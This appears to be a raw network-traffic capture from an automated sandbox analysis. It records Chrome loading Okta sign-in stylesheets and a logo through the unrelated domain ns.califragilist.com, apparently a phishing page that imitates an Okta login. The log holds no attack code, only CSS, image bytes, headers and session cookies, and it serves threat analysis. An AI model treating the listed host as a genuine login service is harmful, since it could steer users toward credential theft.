                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2e 71 74 69 70 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 2e 35 70 78 3b 6c 65 66 74 3a 2d 32 38 30 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 32 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 38 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 35 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 32 38 30 30 30 70 78 7d 2e 71 74 69 70 2d 63 6f 6e 74 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 70 61 64 64 69 6e 67 3a 35 70 78 20 39 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 71
                                                                                                                                              Data Ascii: @charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.q
                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 66 6f 72 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 69 73 6d 69 73 73 2d 69 63 6f 6e 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 2a 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 61 66 74 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 5b 63 6c 61 73 73 5e 3d 22 2d 33 32 22 5d 3a 62 65 66 6f 72 65 7b 73 70 65 61 6b 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d
                                                                                                                                              Data Ascii: fore{font-size:32px;position:absolute}#okta-sign-in .dismiss-icon,#okta-sign-in [class*="-32"]:after,#okta-sign-in [class*="-32"]:before,#okta-sign-in [class^="-32"]:after,#okta-sign-in [class^="-32"]:before{speak:none;-webkit-font-smoothing:antialiased;-
                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 6e 74 3a 22 5c 65 30 31 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 72 65 6d 6f 76 65 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 61 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 35 65 35 65 35 65 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 64 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 61 64 64 2d 31 36 3a 61 66 74 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 3b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 30 31 22 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 6f 75 70 2d 6d 65 6d 62 65 72 2d 72 65 6d 6f 76 65
                                                                                                                                              Data Ascii: nt:"\e01d"}#okta-sign-in .group-remove-16:after{color:#007cc0;content:"\e00a"}#okta-sign-in .group-member-add-16:before{color:#5e5e5e;content:"\e00d"}#okta-sign-in .group-member-add-16:after{color:#007cc0;content:"\e001"}#okta-sign-in .group-member-remove
                                                                                                                                              2024-11-06 15:55:59 UTC15239INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 39 66 39 66 39 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 64 72 6f 70 64 6f 77 6e 2e 6d 6f 72 65 2d 61 63 74 69 6f 6e 73 20 2e 6f 70 74 69 6f 6e 2d 73 65 6c 65 63 74 65 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 3b 66 6c 6f 61 74 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 20 32 32 70 78 20 30 20 38 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 2e 64 72 6f 70 64 6f 77 6e 2e 6d 6f 72 65 2d 61 63 74 69 6f 6e 73 20 2e 6f 70 74 69 6f 6e 2d 73 65 6c 65 63 74 65 64 7b
                                                                                                                                              Data Ascii: background:#f9f9f9}#okta-sign-in .dropdown.more-actions .option-selected{color:#333;float:none!important;overflow:hidden;padding:0 22px 0 8px!important;position:relative;white-space:nowrap}#okta-sign-in .page-links .dropdown.more-actions .option-selected{
                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 63 6f 6e 74 61 69 6e 65 72 2d 73 69 6e 67 6c 65 2e 63 68 7a 6e 2d 72 74 6c 2e 63 68 7a 6e 2d 77 69 74 68 2d 64 72 6f 70 20 2e 63 68 7a 6e 2d 73 69 6e 67 6c 65 20 64 69 76 20 62 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 32 70 78 20 32 70 78 7d 40 6d 65 64 69 61 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 2c 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 68 7a 6e 2d 72 65 73 75 6c 74 73 2d 73 63 72 6f 6c 6c 2d 64 6f 77 6e 20 73 70 61 6e 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 68 7a 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 68 7a 6e 2d 72 65
                                                                                                                                              Data Ascii: container-single.chzn-rtl.chzn-with-drop .chzn-single div b{background-position:-12px 2px}@media (-webkit-min-device-pixel-ratio:2),(min-resolution:192dpi){#okta-sign-in .chzn-container .chzn-results-scroll-down span,#okta-sign-in .chzn-container .chzn-re
                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 31 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 33 2d 34 20 2e 6f 2d 66 6f 72 6d 2d 6c 61 62 65 6c 7b 77 69 64 74 68 3a 32 35 25 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 33 2d 34 20 2e 6f 2d 66 6f 72 6d 2d 69 6e 70 75 74 7b 77 69 64 74 68 3a 37 35 25 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 38 38 38 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 23 66 66 66 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 2d 72 65 61 64 2d 6d 6f
                                                                                                                                              Data Ascii: -radius:0;border-width:0 1px;padding:30px}#okta-sign-in .o-form-3-4 .o-form-label{width:25%}#okta-sign-in .o-form-3-4 .o-form-input{width:75%}#okta-sign-in .o-form .o-form-focus{border:1px solid #888;box-shadow:0 1px 1px #fff}#okta-sign-in .o-form-read-mo
                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 72 65 61 2d 66 69 78 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 38 63 38 63 39 36 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 68 65 69 67 68 74 3a 34 30 70 78 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 69 6e 70 75 74 2d 66 69 78 20 69 6e 70 75 74 5b 64 69 73 61 62 6c 65 64 5d 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 69 6e 70 75 74 2d 66 69 78 20 69 6e 70 75 74 5b 72 65 61 64 6f 6e 6c 79 5d 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 74 65 78 74 61 72 65 61 2d 66 69 78 20 69 6e 70 75 74 5b 64 69 73 61 62 6c 65 64 5d 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 6f 2d 66 6f 72 6d 20 2e 74 65 78 74 61
                                                                                                                                              Data Ascii: rea-fix{border:1px solid #8c8c96;display:inline-block;float:left;height:40px}#okta-sign-in .o-form .input-fix input[disabled],#okta-sign-in .o-form .input-fix input[readonly],#okta-sign-in .o-form .textarea-fix input[disabled],#okta-sign-in .o-form .texta
                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 66 6f 63 75 73 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 6c 69 6e 6b 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 35 65 64 66 62 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 32 34 61 39 34 3b 63 6f 6c 6f 72 3a 23 31 32 34 61 39 34 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 6c 69 6e 6b 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 6c 69 6e 6b 2d 62 75 74 74 6f 6e 3a 66 6f 63 75 73 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 62 75 74 74 6f 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 6c 69 6e 6b 2d 62
                                                                                                                                              Data Ascii: focus,#okta-sign-in .button-secondary.link-button:hover{background-color:#e5edfb;border-color:#124a94;color:#124a94}#okta-sign-in .button-secondary.link-button:active,#okta-sign-in .button-secondary.link-button:focus,#okta-sign-in .button-secondary.link-b
                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 63 6f 6e 73 65 6e 74 2d 66 6f 6f 74 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 37 63 63 30 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 63 6f 6e 73 65 6e 74 2d 72 65 71 75 69 72 65 64 20 2e 6f 2d 66 6f 72 6d 2d 62 75 74 74 6f 6e 2d 62 61 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 67 72 61 6e 75 6c 61 72 2d 63 6f 6e 73 65 6e 74 20 2e 6f 2d 66 6f 72 6d 2d 62 75 74 74 6f 6e 2d 62
                                                                                                                                              Data Ascii: consent .consent-footer{text-align:center}#okta-sign-in .consent-required .consent-footer a,#okta-sign-in .granular-consent .consent-footer a{color:#007cc0}#okta-sign-in .consent-required .o-form-button-bar,#okta-sign-in .granular-consent .o-form-button-b
                                                                                                                                              2024-11-06 15:55:59 UTC16384INData Raw: 72 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 76 65 72 69 66 79 2d 75 32 66 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 76 65 72 69 66 79 2d 77 65 62 61 75 74 68 6e 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 66 69 65 6c 64 73 65 74 2d 63 6f 6e 74 61 69 6e 65 72 20 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 65 6e 72 6f 6c 6c 2d 75 32 66 2d 66 6f 72 6d 20 2e 6f 2d 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 3e 2e 6f 2d 66 6f 72 6d 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 2c 23 6f 6b 74 61 2d 73 69 67 6e 2d 69 6e 20 2e 65 6e 72
                                                                                                                                              Data Ascii: r p,#okta-sign-in .verify-u2f-form .o-form-fieldset-container p,#okta-sign-in .verify-webauthn-form .o-form-fieldset-container p{margin-bottom:15px;text-align:center}#okta-sign-in .enroll-u2f-form .o-form-content>.o-form-error-container,#okta-sign-in .enr


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              56192.168.2.184982213.33.187.1204432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:58 UTC612OUTGET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1
                                                                                                                                              Host: ok4static.oktacdn.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:59 UTC768INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: text/css
                                                                                                                                              Content-Length: 10498
                                                                                                                                              Connection: close
                                                                                                                                              Date: Mon, 28 Oct 2024 23:01:17 GMT
                                                                                                                                              Server: nginx
                                                                                                                                              Last-Modified: Thu, 14 Mar 2024 00:03:58 GMT
                                                                                                                                              ETag: "e0d37a504604ef874bad26435d62011f"
                                                                                                                                              x-amz-meta-sha1sum: 4301f0d2b729ae22adece657d79eccaa25f429b1
                                                                                                                                              Expires: Tue, 28 Oct 2025 23:01:17 GMT
                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                              Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                                                                                                              Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                              Via: 1.1 46b6cb3d5daab7defe28d3658c3a54fe.cloudfront.net (CloudFront)
                                                                                                                                              X-Amz-Cf-Pop: FRA60-P9
                                                                                                                                              X-Amz-Cf-Id: 3KPIyYHYG9g3a8Mc1V4O53hY5iACiJ4ikNtf6lak605tRhNNLpVKoA==
                                                                                                                                              Age: 752082
                                                                                                                                              2024-11-06 15:55:59 UTC10498INData Raw: 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 61 70 70 6c 65 74 2c 62 2c 62 69 67 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6f 64 79 2c 63 61 70 74 69 6f 6e 2c 63 65 6e 74 65 72 2c 63 69 74 65 2c 63 6f 64 65 2c 64 64 2c 64 65 6c 2c 64 66 6e 2c 64 69 76 2c 64 6c 2c 64 74 2c 65 6d 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 74 6d 6c 2c 69 2c 69 66 72 61 6d 65 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 6c 69 2c 6f 62 6a 65 63 74 2c 6f 6c 2c 70 2c 70 72 65 2c 71 2c 73 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 70 61 6e 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 2c 74 61 62 6c 65 2c 74 62 6f 64 79 2c 74 64 2c 74 66 6f 6f 74 2c 74
                                                                                                                                              Data Ascii: a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,t


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              57192.168.2.184982013.33.187.1204432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:58 UTC614OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                                                                                                              Host: ok4static.oktacdn.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:59 UTC684INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 10796
                                                                                                                                              Connection: close
                                                                                                                                              Date: Mon, 04 Nov 2024 07:34:47 GMT
                                                                                                                                              Server: nginx
                                                                                                                                              Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                                                                                                              ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                                                                                                              Expires: Tue, 04 Nov 2025 07:34:47 GMT
                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                              Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                                                                                                              Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                              Via: 1.1 3e79abe3bfc4a431738eb9199cb216f6.cloudfront.net (CloudFront)
                                                                                                                                              X-Amz-Cf-Pop: FRA60-P9
                                                                                                                                              X-Amz-Cf-Id: hlBy24eR3-FwHZrGVzNCrhht5Qiowj68RxvZHMSkMcdbC2YOq7MSTg==
                                                                                                                                              Age: 202872
                                                                                                                                              2024-11-06 15:55:59 UTC10796INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                                                                                                              Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              58192.168.2.1849823188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:59 UTC1181OUTGET /exdlnqbmbchbkrnxhuntke151625768903329522495766gd0sztam2f63i24v08nret?71107507272637789503550UT0MURYOK2EBMVG64K4712 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:59 UTC982INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:59 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NvQXR867hHHaMXFPotOwNLC7jl8B01m8O5Gz%2F5Y9UPTd11sRU1G5dFfrT9le%2B2z26dt0RYEwePi7v9xLevKxo%2FlINBGdPfbG7xgS%2BTovxDCIgZghH0HkG%2B9h1R1W3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3452&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2102&delivery_rate=834101&cwnd=251&unsent_bytes=0&cid=f9c11eaaba2b0303&ts=149&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6455f8c5f6bb3-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=992&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1759&delivery_rate=2803484&cwnd=251&unsent_bytes=0&cid=62635c2cc0310897&ts=547&x=0"
                                                                                                                                              2024-11-06 15:55:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              59192.168.2.1849825188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:59 UTC1292OUTGET /34m8PEW3Ch1AL9UabKKEr8920 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
